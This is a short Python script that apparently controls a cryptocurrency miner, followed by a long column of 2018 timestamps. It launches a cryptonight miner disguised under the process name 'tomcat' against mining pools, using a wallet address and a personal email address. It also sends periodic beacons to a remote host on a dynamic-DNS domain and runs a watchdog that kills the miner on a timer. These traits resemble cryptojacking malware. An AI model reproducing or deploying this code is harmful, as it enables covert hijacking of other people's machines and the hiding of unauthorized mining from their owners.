import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:37:06.589054
#2018-02-17 17:25:01.396175
#2018-02-17 19:14:06.014599
#2018-02-17 21:03:07.415345
#2018-02-17 22:48:07.757411
#2018-02-18 00:33:06.923215
#2018-02-18 02:24:01.556467
#2018-02-18 04:11:05.408774
#2018-02-18 06:02:01.978128
#2018-02-18 07:52:07.020007
#2018-02-18 09:41:05.674535
#2018-02-18 11:28:06.620742
#2018-02-18 13:14:03.484903
#2018-02-18 15:03:05.701266
#2018-02-18 16:51:05.749501
#2018-02-18 18:39:05.238508
#2018-02-18 20:27:03.655609
#2018-02-18 22:12:07.597500
#2018-02-19 00:01:01.520193
#2018-02-19 01:46:04.997462
#2018-02-19 03:34:04.973664
#2018-02-19 05:19:01.997269
#2018-02-19 07:05:08.380919
#2018-02-19 08:55:07.196163
#2018-02-19 10:44:01.632622
#2018-02-19 12:32:01.638162
#2018-02-19 14:18:09.669474
#2018-02-19 16:08:03.932150
#2018-02-19 17:57:07.009192
#2018-02-19 19:45:06.998325
#2018-02-19 21:34:08.085928
#2018-02-19 23:20:09.159019
#2018-02-20 01:06:05.344666
#2018-02-20 02:55:05.256874
#2018-02-20 04:43:05.804758
#2018-02-20 06:29:01.346674
#2018-02-20 08:13:08.154010
#2018-02-20 09:58:07.674940
#2018-02-20 11:43:09.178748
#2018-02-20 13:32:05.905084
#2018-02-20 15:22:01.348501
#2018-02-20 17:08:09.968522
#2018-02-20 18:56:06.471449
#2018-02-20 20:46:08.509949
#2018-02-20 22:32:06.605904
#2018-02-21 00:14:05.652655
#2018-02-21 01:59:07.624781
#2018-02-21 03:47:04.823023
#2018-02-21 05:36:02.213029
#2018-02-21 07:23:01.934778
#2018-02-21 09:08:01.237572
#2018-02-21 10:56:04.329020
#2018-02-21 12:42:08.645197
#2018-02-21 14:32:04.011162
#2018-02-21 16:19:08.698757
#2018-02-21 18:09:05.595925
#2018-02-21 19:56:05.637421
#2018-02-21 21:43:05.952274
#2018-02-21 23:32:08.091536
#2018-02-22 01:22:04.300118
#2018-02-22 03:12:01.794643
#2018-02-22 04:57:03.884293
#2018-02-22 06:40:06.367076
#2018-02-22 08:30:01.627440
#2018-02-22 10:17:07.297229
#2018-02-22 12:02:06.012895
#2018-02-22 13:49:07.194425
#2018-02-22 15:38:07.106433
#2018-02-22 17:26:05.330868
#2018-02-22 19:15:09.779455
#2018-02-22 21:08:05.145544
#2018-02-22 22:54:07.346962
#2018-02-23 00:44:06.858682
#2018-02-23 02:34:07.061926
#2018-02-23 04:21:06.232538
#2018-02-23 06:08:01.630647
#2018-02-23 07:54:06.203471
#2018-02-23 10:15:02.163201
#2018-02-23 12:08:08.854825
#2018-02-23 13:55:09.060525
#2018-02-23 15:46:10.488476
#2018-02-23 17:32:02.188404
#2018-02-23 19:18:07.784952
#2018-02-23 21:03:02.105903
#2018-02-23 22:49:01.944939
#2018-02-24 00:36:07.219090
#2018-02-24 02:26:07.075452
#2018-02-24 04:16:03.623038
#2018-02-24 06:04:04.364486
#2018-02-24 07:51:03.462838
#2018-02-24 09:35:01.582886
#2018-02-24 11:28:04.341158
#2018-02-24 13:18:04.472205
#2018-02-24 15:09:05.610509
#2018-02-24 16:57:03.901000
#2018-02-24 18:45:09.374500
#2018-02-24 20:36:07.582138
#2018-02-24 22:43:07.197619
#2018-02-25 02:05:05.732681
#2018-02-25 05:47:05.583564
#2018-02-25 11:37:06.884792